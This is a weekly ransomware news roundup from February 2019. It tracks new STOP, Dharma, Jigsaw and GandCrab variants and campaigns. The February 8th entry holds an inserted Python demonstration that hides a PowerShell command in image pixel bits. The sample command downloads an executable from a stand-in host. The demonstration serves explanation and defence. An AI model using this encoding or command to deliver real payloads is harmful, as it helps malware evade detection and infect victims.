This week was mostly filled with new variants of existing ransomware families such as STOP, Dharma, and Jigsaw. There was some interesting news, though: a ransomware downloader that reconstructs its PowerShell command from the pixels of an image, and shady data recovery companies partnering with GandCrab to make extra profits.
Contributors and those who provided new ransomware information and stories this week include: @fwosar, @malwrhunterteam, @Seifreed, @PolarToffee, @demonslay335, @struppigel, @LawrenceAbrams, @malwareforme, @FourOctets, @jorntvdw, @BleepinComputer, @disabdillah, @petrovic082, @JakubKroustek, @_CPResearch_, @coveware, @dvk01uk, and @bromium.
February 2nd 2019
MalwareHunterTeam found a new variant of the PayDay Ransomware that uses a ransom note named HOW_TO_DECRYPT_MY_FILES.txt.
February 4th 2019
dis found a new variant of the STOP Ransomware that uses the .blower extension.
Michael Gillespie found a new variant of the RotorCrypt Ransomware that appends the “!email@example.com” extension.
Michael Gillespie found a new variant of the Dharma Ransomware that appends the .888 extension.
MalwareHunterTeam found a new Jigsaw Ransomware that uses the .PennyWise extension for encrypted files.
February 5th 2019
Petrovic found a new ransomware that appends the .crypted_pony_test_build_xxx_xxx_xxx_xxx_xxx extension to encrypted files.
February 6th 2019
According to Check Point Research, cryptominers infected roughly ten times more organizations during 2018 than ransomware did, yet only one in five security professionals knew that their company’s systems had been hit by a malware attack.
A Coveware report describes how the GandCrab ransomware Tor site lets shady data recovery companies hide the actual ransom cost from victims, and notes that GandCrab is currently being disseminated through a large assortment of distribution channels.
MalwareHunterTeam found a Russian ransomware sample that drops a ransom note named Your files are now encrypted.txt but does not append an extension to encrypted files. The sample is signed with a valid certificate.
February 7th 2019
Michael Gillespie found a new ransomware that appends the .FileSlack extension and drops a ransom note named Readme_Restore_Files.txt.
Michael Gillespie is looking for a ransomware sample that appends the .pluto extension and drops a ransom note named !!!READ_IT!!!.txt.
Michael Gillespie found a new Jigsaw Ransomware variant that appends .paycoin to encrypted files and sets a custom desktop background.
Jakub Kroustek found new Dharma variants that append the .amber or .frend extension.
February 8th 2019
A malicious spreadsheet has been discovered that builds a PowerShell command from individual pixels in a downloaded image of Mario from Super Mario Bros. When executed, this command downloads and installs malware, including the GandCrab Ransomware.
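To make the mechanism concrete, here is an added Python example (not code from this article, from the spreadsheet campaign, or from any of the researchers credited above). It shows the general technique of hiding a command in image pixels and reassembling it from them: each bit of the payload is written into the least-significant bit of successive colour channels, so the pixels look unchanged and the command never appears as a plain string in the image bytes. The in-memory pixel list, the length-prefixed LSB layout and the sample command with its example.invalid host are all constructed for the demonstration; nothing is executed, the recovered command is only returned.

```python
import random

# Constructed carrier: deterministic "noise" image as a flat list of RGB
# tuples. A real loader would read pixels from a downloaded PNG/JPEG.
def make_carrier(width, height, seed=1):
    rng = random.Random(seed)
    return [(rng.randrange(256), rng.randrange(256), rng.randrange(256))
            for _ in range(width * height)]


def _bits(data):
    """Yield the bits of a byte string, most significant bit first."""
    for byte in data:
        for i in range(7, -1, -1):
            yield (byte >> i) & 1


def embed(pixels, payload):
    """Hide payload in the least-significant bit of successive channels.
    Assumed layout: 2-byte big-endian length, then the UTF-8 payload."""
    data = payload.encode("utf-8")
    if len(data) > 0xFFFF:
        raise ValueError("payload too long for the 16-bit length field")
    data = len(data).to_bytes(2, "big") + data
    capacity = len(pixels) * 3
    if len(data) * 8 > capacity:
        raise ValueError(f"need {len(data) * 8} channel slots, carrier has {capacity}")
    bits = _bits(data)
    out = []
    for px in pixels:
        chans = list(px)
        for c in range(3):
            b = next(bits, None)
            if b is not None:
                chans[c] = (chans[c] & 0xFE) | b  # only the LSB changes
        out.append(tuple(chans))
    return out


def extract(pixels):
    """Reassemble the hidden payload from the pixel LSBs (the decoder a
    downloader would run before handing the string to PowerShell)."""
    channels = (c for px in pixels for c in px)

    def read_byte():
        v = 0
        for _ in range(8):
            v = (v << 1) | (next(channels) & 1)
        return v

    length = (read_byte() << 8) | read_byte()
    return bytes(read_byte() for _ in range(length)).decode("utf-8")


def raw_bytes(pixels):
    """The image as a flat byte stream, i.e. what a string scanner sees."""
    return bytes(c for px in pixels for c in px)


def demo():
    # Constructed sample command; the host does not resolve on purpose.
    cmd = ("powershell -nop -w hidden -c \"Invoke-WebRequest "
           "http://example.invalid/stage2.exe -OutFile $env:TEMP\\s.exe\"")
    carrier = make_carrier(64, 64)
    stego = embed(carrier, cmd)
    max_delta = max(abs(a - b) for p, q in zip(carrier, stego) for a, b in zip(p, q))
    return {
        "recovered": extract(stego),
        "visible_in_bytes": cmd.encode("utf-8") in raw_bytes(stego),
        "max_channel_delta": max_delta,
    }


if __name__ == "__main__":
    print(demo())
```

The point for defenders is the last two results: every channel value moves by at most one, and the command is not present in the image byte stream, so signature matching on the downloaded picture finds nothing. What remains observable is behaviour: an Office process spawning PowerShell, and that PowerShell fetching a second stage.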
Michael Gillespie found a new ransomware that appends the .Clop extension to encrypted file names and drops a ransom note named ClopReadMe.txt.
My Online Security reports:
It’s Friday afternoon at the end of a busy week for many people and we get yet another Gandcrab ransomware campaign. This campaign is slightly different to previous versions that I have seen. We generally see Gandcrab delivered via Office (normally Word) documents, either macros or possibly Equation Editor or other embedded OLE object exploits. Today’s version is the first time that I have seen a .js file inside a zip that was password protected as the initial vector. You need the password “invoice123” to be able to open the zip file.